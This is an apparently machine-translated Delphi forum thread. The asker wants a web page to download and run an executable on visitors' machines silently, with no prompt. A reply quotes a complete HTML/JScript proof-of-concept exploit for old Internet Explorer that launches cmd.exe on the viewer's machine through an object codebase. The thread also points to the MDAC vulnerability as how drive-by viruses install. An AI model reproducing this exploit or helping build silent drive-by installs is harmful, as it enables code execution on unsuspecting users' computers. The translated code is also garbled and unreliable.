It is related to the use of OCX and cab packages on the webpage. Delphi/Windows SDK/API
Http://www.delphi2007.net/DelphiBase/html/delphi_20061218114045129.html
I wonder if you have such an experience. After opening a webpage, you will find that the system is poisoned, and you have not performed any suspicious operations. You just opened a webpage.
I used to search for information for anti-virus attacks and opened a website that looked like anti-virus. In an instant, there were more than 10 viruses on the machine. At this time, ie does not prompt me any plug-ins, whether to install them or not.
The problem now is that no matter how I pack and sign the ocx, I will prompt the customer whether to download it, how are some viruses so powerful ??
What I want to achieve now is that the client does not need any prompts, and does not need to be prompted during the first download, and does not need to be prompted each time it is run, in addition, the security setting of IE is the default setting. In addition, I want to automatically download an executable file from the cab package.
Experts can see whether it can be implemented or give some comments. I don't want to be a virus, but want to optimize the B/S structure software to make him smart.
This idea has been around for a long time and has not been implemented for a long time!
These viruses are not ocx, but EXE files.
So how does one let your machine run those EXE files ??
Versions earlier than IE6 can be implemented
Yes. The EXE file exploits the MDAC Vulnerability.
Please see micro-channel Security Announcement: http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx
Latest Research Report:
<HTML>
<Head>
<Title> IE6 security... </title>
<Script language = JScript>
VaR programname = new array (
'C:/Windows/system32/cmd.exe ',
'C:/winnt/system32/cmd.exe ',
'C:/cmd.exe'
);
Function Init (){
VaR opopup = Window. createpopup ();
VaR opopbody=opopup.doc ument. Body;
VaR N, html = '';
For (n = 0; n <programname. length; n ++)
HTML + = "<object name = 'X' classid = 'clsid: 11111111-1111-1111-1111-111111111111'codebase = '"+ programname [N] +"' % 1 = 'R'> </Object> ";
Opopbody. innerhtml = HTML;
Opopup. Show (290,190,200,200, document. Body );
}
</SCRIPT>
</Head>
<Body onload = "Init ()">
<P>
This page doesn't do anything malicious (this page is not malicious), but is a demonstration of how to execute a program on a remote machine using
Marvelously secure Internet Explorer Web browser !! (But it demonstrates how to execute Program !! A little ironic about Microsoft's IE, that is, executing programs on the client through IE)
</P>
<P>
Up until at least 18/02/02, this script wocould open a command window when viewed in ie5/6 under WindowsXP and Win2k (possibly also winme). There
Are currently no patches available using "Windows Update" which will prevent this.
</P>
The popularity in Delphi is really bad !!!
Fuck it, fix it yourself.
Can you tell me how to solve this problem?